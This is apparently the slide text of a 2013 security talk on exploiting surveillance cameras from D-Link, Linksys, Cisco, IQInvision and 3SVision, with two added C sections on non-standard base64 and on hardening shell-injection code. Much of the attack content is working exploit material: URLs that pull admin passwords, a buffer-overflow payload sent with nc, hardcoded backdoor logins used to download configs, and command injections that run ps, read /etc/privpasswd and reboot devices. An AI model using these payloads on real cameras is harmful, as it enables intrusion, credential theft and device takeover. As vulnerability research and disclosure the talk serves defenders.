Exploiting Surveillance Cameras Like a Hollywood Hacker
Craig Heffner, Tactical Network Solutions
Friday, July 12, 2013
Introduction
✤ Embedded vulnerability analyst for Tactical Network Solutions
✤ Embedded Device Exploitation course instructor
✤ I do wireless stuff from time to time too

Objectives
✤ Analyze surveillance camera security
✤ Drop some 0-days
✤ Demo a true Hollywood-style hack
D-Link DCS-7410

Lighttpd Access Rules

What Isn’t in the Access Rules?

rtpd.cgi

eval($QUERY_STRING)
✤ http://192.168.1.101/cgi-bin/rtpd.cgi?action=stop
The Exploit (No, Seriously...)
✤ http://192.168.1.101/cgi-bin/rtpd.cgi?reboot

Grabbing Admin Creds
✤ /cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

pwned.
Also Affected
Shodan Dork

CVE-2013-1599
✤ Disclosed by Core Security after talk submission

WVC80N

/img/snapshot.cgi

/adm/ez.cgi

strcpy(dest, QUERY_STRING)
/img/snapshot.cgi?A*152

Where to Return?

Return to sub_9B88
✤ PAYLOAD=$(perl -e 'print "A"x148; print "\x88\x9B"')
✤ echo -ne "GET /img/snapshot.cgi?$PAYLOAD HTTP/1.0\r\n\r\n" | nc 192.168.1.100 80
When Base64 Isn’t Base64

BEST. USER GUIDE. EVER.

Decoded Config

pwned.

Also Affected

Shodan Dorks

Cisco PVC-2300

.htpasswd Protection

/usr/local/www/oamp

cgi_get_value(var_18, "action")

Valid Actions
✤ downloadConfigurationFile
✤ uploadConfigurationFile
✤ updateFirmware
✤ loadFirmware
✤ ...

getenv("SESSIONID")

strcasecmp("login", action)

cgi_get_value(var_10, "user")

cgi_get_value(var_10, "password")

PRO_GetStr("OAMP", "l1_usr", ...)

PRO_GetStr("OAMP", "l1_pwd", ...)

strcmp(user, l1_usr)

strcmp(password, l1_pwd)

Where are l1_usr and l1_pwd?
Getting a Session ID
✤ $ wget 'http://192.168.1.101/oamp/System.xml?action=login&user=L1_admin&password=L1_51'

downloadConfigurationFile
✤ $ wget --header="sessionID: 57592414" \
    'http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile'

When Base64 Isn’t Base64

Non-Standard Key String

Decoded Config
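Both "When Base64 Isn’t Base64" slides (WVC80N above, PVC-2300 here) describe a configuration file encoded with base64 over a non-standard alphabet ("Non-Standard Key String"). The decoder below is an added example, not code from the talk or from either vendor. The alternate alphabet it uses is constructed for illustration (the standard alphabet rotated by 13 positions) and is not the key string from either device; the point is that a swapped alphabet is obfuscation, not encryption: whoever can read the table out of the firmware can decode the file, so credentials stored this way should be treated as plaintext.

```c
/* Added example (not the talk's or the vendors' code): base64 decoding with
 * a caller-supplied alphabet. EXAMPLE_ALT_B64 is a constructed alphabet for
 * this example only, NOT the key string from either camera's firmware. */
#include <stdio.h>
#include <string.h>

#define STD_B64 "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
/* Constructed: the standard alphabet rotated by 13 positions. */
#define EXAMPLE_ALT_B64 "NOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLM"

/* Decode `len` bytes of `in` using `alphabet` (64 chars, '=' pads).
 * Returns bytes written to `out`, or -1 on a character outside the
 * alphabet, bad padding, a length that is not a multiple of 4, or overflow. */
int b64_decode_alphabet(const char *alphabet, const char *in, size_t len,
                        unsigned char *out, size_t outcap)
{
    int idx[256];
    for (int i = 0; i < 256; i++) idx[i] = -1;
    for (int i = 0; i < 64; i++) idx[(unsigned char)alphabet[i]] = i;
    if (len % 4 != 0) return -1;
    size_t o = 0;
    for (size_t i = 0; i < len; i += 4) {
        unsigned v = 0;
        int pad = 0;
        for (int k = 0; k < 4; k++) {
            unsigned char c = (unsigned char)in[i + k];
            /* '=' is only legal in the last two positions of the last group */
            if (c == '=' && i + 4 == len && k >= 2) { pad++; v <<= 6; continue; }
            if (idx[c] < 0 || pad) return -1;
            v = (v << 6) | (unsigned)idx[c];
        }
        int nbytes = 3 - pad;
        if (o + (size_t)nbytes > outcap) return -1;
        out[o++] = (unsigned char)((v >> 16) & 0xff);
        if (nbytes > 1) out[o++] = (unsigned char)((v >> 8) & 0xff);
        if (nbytes > 2) out[o++] = (unsigned char)(v & 0xff);
    }
    return (int)o;
}

/* Encoder with the same alphabet parameter, used here to build a sample
 * "obfuscated" line. Returns characters written (NUL-terminated), -1 on overflow. */
int b64_encode_alphabet(const char *alphabet, const unsigned char *in, size_t len,
                        char *out, size_t outcap)
{
    size_t o = 0;
    for (size_t i = 0; i < len; i += 3) {
        unsigned v = (unsigned)in[i] << 16;
        if (i + 1 < len) v |= (unsigned)in[i + 1] << 8;
        if (i + 2 < len) v |= (unsigned)in[i + 2];
        if (o + 4 >= outcap) return -1;
        out[o++] = alphabet[(v >> 18) & 63];
        out[o++] = alphabet[(v >> 12) & 63];
        out[o++] = (i + 1 < len) ? alphabet[(v >> 6) & 63] : '=';
        out[o++] = (i + 2 < len) ? alphabet[v & 63] : '=';
    }
    out[o] = '\0';
    return (int)o;
}

int main(void)
{
    /* Constructed sample value; not a credential from any device. */
    const char *secret = "admin:example-password";
    char enc[64];
    unsigned char dec[64];
    b64_encode_alphabet(EXAMPLE_ALT_B64, (const unsigned char *)secret, strlen(secret), enc, sizeof enc);
    printf("stored form:                 %s\n", enc);
    int n = b64_decode_alphabet(STD_B64, enc, strlen(enc), dec, sizeof dec);
    printf("standard-alphabet decode:    %d bytes of junk\n", n);
    n = b64_decode_alphabet(EXAMPLE_ALT_B64, enc, strlen(enc), dec, sizeof dec);
    printf("with the right alphabet:     %.*s\n", n, (const char *)dec);
    return 0;
}
```

A standard decoder accepts the stored form without complaint (every character is in the standard alphabet) and returns garbage, which is what makes the file look "encrypted" until the alphabet is recovered from the binary.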
pwned.

action=loadFirmware
pwned x2
✤ $ wget --header="sessionID: 57592414" \
    'http://192.168.1.101/oamp/System.xml?action=loadFirmware&url=https://127.0.0.1:65534/ ;reboot;'

Also Affected

Shodan Dork

IQInvision IQ832N

Default Unauth Video Feed

Admin Area Password Protected

oidtable.cgi

strstr(QUERY_STRING, "grep=")

if(strlen(grep) < 32)

sprintf("grep -i '%s'...")

popen("grep -i '%s'...")
Command Injection
✤ http://192.168.1.101/oidtable.cgi?grep='$IFS/tmp/a;ps;'
✤ grep -i '' /tmp/a;ps;'' /tmp/oidtable.html

Retrieving Arbitrary Files
✤ http://192.168.1.101/oidtable.cgi?grep='$IFS/etc/privpasswd;'
✤ grep -i '' /etc/privpasswd;'' /tmp/oidtable.html

Encrypted Admin Password

Decrypted Admin Password

pwned.

Also Affected

Shodan Dork
✤ jht

3SVision N5071

Restricted Firmware Download
Use the Source, Luke

Literacy FTW

/home/3s/bin

pwdgrp_get_userinfo
Hardest. Exploit. Ever.

pwned.
do_records

records.cgi?action=remove

strstr(cgi_parameters, "&filename")

system("rm /mnt/sd/media/%s")

pwned x2
✤ $ wget \
    --user=3sadmin --password=27988303 \
    'http://192.168.1.101/records.cgi?action=remove&storage=sd&filename=`reboot`'
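The oidtable.cgi slides (strstr on the query string, sprintf into a grep command line, popen) and the records.cgi slides (strstr for &filename, system("rm /mnt/sd/media/%s")) are the same bug class: a request parameter spliced into a command line that a shell then interprets, so quoting in the template is no defence once the value carries its own quote, ';', $IFS or backticks. The C below is an added example, not the cameras' code; the function names and the allow-list are this example's assumptions. It builds the exact strings the slides show reaching popen() and system(), then contrasts them with an allow-list check and an execv() path that never involves a shell.

```c
/* Added example (not the cameras' code): the request-parameter-to-shell
 * pattern behind oidtable.cgi's grep= and records.cgi's filename=, beside a
 * hardened version. Function names and the allow-list are assumptions. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern from the oidtable.cgi slides: the value sits inside
 * single quotes in the template, but a value that itself contains a quote,
 * ';' or $IFS breaks out of them once the string reaches popen()'s shell. */
int build_grep_command_unsafe(char *out, size_t outcap, const char *grep)
{
    int n = snprintf(out, outcap, "grep -i '%s' /tmp/oidtable.html", grep);
    return (n < 0 || (size_t)n >= outcap) ? -1 : n;
}

/* Vulnerable pattern from the records.cgi slides: no quoting at all, so
 * backticks or ';' in filename run as commands under system(). */
int build_rm_command_unsafe(char *out, size_t outcap, const char *filename)
{
    int n = snprintf(out, outcap, "rm /mnt/sd/media/%s", filename);
    return (n < 0 || (size_t)n >= outcap) ? -1 : n;
}

/* Check: accept only a short token of [A-Za-z0-9._-] that does not start
 * with '-' (option injection) and contains no ".." (traversal). Everything
 * the slides' payloads rely on ('$', ';', '`', '/', whitespace) is rejected
 * before any command is built. The length bound mirrors the slides'
 * strlen(grep) < 32 check, which on its own stopped nothing. */
int param_is_safe(const char *v, size_t maxlen)
{
    size_t len = strlen(v);
    if (len == 0 || len >= maxlen) return 0;
    if (v[0] == '-' || strstr(v, "..") != NULL) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)v[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Hardened execution: no shell. argv goes straight to execv(), so any
 * metacharacter in an argument is just a byte of that argument.
 * Returns the child's exit status, or -1 on failure. */
int run_argv(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Hardened replacement for system("rm /mnt/sd/media/%s"): validate first,
 * then exec rm with the path as a single argument ("--" ends option parsing). */
int remove_recording(const char *mediadir, const char *filename)
{
    if (!param_is_safe(filename, 32)) return -1;
    char path[256];
    if (snprintf(path, sizeof path, "%s/%s", mediadir, filename) >= (int)sizeof path) return -1;
    char *argv[] = { "/bin/rm", "--", path, NULL };
    return run_argv(argv);
}

int main(void)
{
    char cmd[256];
    build_grep_command_unsafe(cmd, sizeof cmd, "'$IFS/tmp/a;ps;'");  /* payload from the slides */
    printf("popen() would receive:  %s\n", cmd);
    build_rm_command_unsafe(cmd, sizeof cmd, "`reboot`");            /* payload from the slides */
    printf("system() would receive: %s\n", cmd);
    printf("param_is_safe(\"cam01.avi\") = %d\n", param_is_safe("cam01.avi", 32));
    printf("param_is_safe(\"`reboot`\")  = %d\n", param_is_safe("`reboot`", 32));
    return 0;
}
```

The allow-list is deliberately narrower than "escape the shell metacharacters": escaping has to be right for every shell the firmware might ship, whereas execv() with a fixed argv removes the shell from the path entirely, and the character check then only has to protect the file system, not the command parser.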
Also Affected
Shodan Dorks